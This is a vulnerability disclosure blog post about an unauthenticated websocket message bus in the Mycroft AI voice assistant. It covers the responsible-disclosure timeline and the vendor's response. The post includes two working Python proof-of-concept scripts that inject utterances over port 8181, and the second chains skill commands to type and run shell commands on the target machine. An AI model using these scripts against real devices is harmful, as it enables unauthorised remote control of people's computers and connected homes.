Getting "Zero Click" Remote Code Execution in Mycroft AI vocal assistant

During my journey contributing to open source I was working with my friend Matteo De Carlo on an AUR Package of a really interesting project called Mycroft AI. It’s an AI-powered vocal assistant started with a crowdfunding campaign in 2015 and a more recent one that allowed Mycroft to produce their Mark-I and Mark-II devices. It’s also running on Linux Desktop/Server, Raspberry PI and will be available soon™ on Jaguar F-Type and Land Rover.

Mycroft AI

Digging in the source code

While looking at the source code I found an interesting point: here

...
host = config.get("host")
port = config.get("port")
route = config.get("route")
validate_param(host, "websocket.host")
validate_param(port, "websocket.port")
validate_param(route, "websocket.route")

routes = [
        (route, WebsocketEventHandler)
]
application = web.Application(routes, **settings)
application.listen(port, host)
ioloop.IOLoop.instance().start()
...

it defines a websocket server that uses to get instructions from the remote clients (like the Android one). The settings for the websocket server are defined in mycroft.conf

// The mycroft-core messagebus' websocket
  "websocket": {
    "host": "0.0.0.0",
    "port": 8181,
    "route": "/core",
    "ssl": false
},

So there is a websocket server that doesn’t require authentication that by default is exposed on 0.0.0.0:8181/core. Let’s test it 😉

#!/usr/bin/env python

import asyncio
import websockets

uri = "ws://myserver:8181/core"
command = "say pwned"

async def sendPayload():
    async with websockets.connect(uri) as websocket:
        await websocket.send("{\"data\": {\"utterances\": [\""+command+"\"]}, \"type\": \"recognizer_loop:utterance\", \"context\": null}")

asyncio.get_event_loop().run_until_complete(sendPayload())

And magically we have an answer from the vocal assistant saying pwned!

Well, now we can have Mycroft pronounce stuff remotely, but this is not a really big finding unless you want to scare your friends, right?

Trump WRONG

The skills system

Digging deeper we can see that Mycroft has a skills system and a default skill that can install others skills (pretty neat, right?)

How is a skill composed? From what we can see from the documentation a default skill is composed by:

dialog/en-us/command.dialog contains the vocal command that will trigger the skill
vocab/en-us/answer.voc contains the answer that Mycroft will pronounce
requirements.txt contains the requirements for the skill that will be installed with pip
__int__.py contains the main function of the skill and will be loaded when the skill is triggered

What can I do now?

I could create a malicious skill that when triggered runs arbitrary code on the remote machine, but unfortunately this is not possible via vocal command unless the URL of the skill is not whitelisted via the online website. So this is possible but will be a little tricky.

So I’m done?

Not yet. I found out that I can trigger skills remotely and that is possible to execute commands on a remote machine convincing the user to install a malicious skill. I may have enough to submit a vulnerability report. But maybe I can do a bit better…

Getting a remote shell using default skills

We know that Mycroft has some default skills like open that will open an application and others that are whitelisted but not installed. Reading through to the list, I found a really interesting skill called skill-autogui, whose description says Manipulate your mouse and keyboard with Mycroft. We got it!

Let’s try to combine everything we found so far into a PoC:

#!/usr/bin/env python

import sys
import asyncio
import websockets
import time


cmds = ["mute audio"] + sys.argv[1:]
uri = "ws://myserver:8181/core"


async def sendPayload():
    for payload in cmds:
        async with websockets.connect(uri) as websocket:
            await websocket.send("{\"data\": {\"utterances\": [\""+payload+"\"]}, \"type\": \"recognizer_loop:utterance\", \"context\": null}")
            time.sleep(1)

asyncio.get_event_loop().run_until_complete(sendPayload())

Running the exploit with python pwn.py "install autogui" "open xterm" "type echo pwned" "press enter" allowed me to finally get a command execution on a Linux machine.

PoC

WASSUUUUUUUUUUUUUUUUUUUUUUUUP

Notes

open xterm was needed because my test Linux environment had a DE installed, on a remote server the commands will be executed directly on TTY so this step is not nesessary.
The skill branching had a big change and now some skills are not (yet) available (autogui is one of them) but this is not the real point. Mycroft has skills to interact with domotic houses and other services that can still be manipulated (the lack of imagination is the limit here). The vulnerability lies in the lack of authentication for the ws.

Affected devices

All the devices running Mycroft <= ? with the websocket server exposed (Mark-I has the websocket behind a firewall by default)

Timeline

08/03/2018 Vulnerability found
09/03/2018 Vulnerability reported
13/03/2018 The CTO answered that they are aware of this problem and are currently working on a patch
06/06/2018 The CTO said that they have no problem with the release of the vulnerability and will add a warning to remember the user to use a firewall ¯\_(ツ)_/¯
09/06/2018 Public disclosure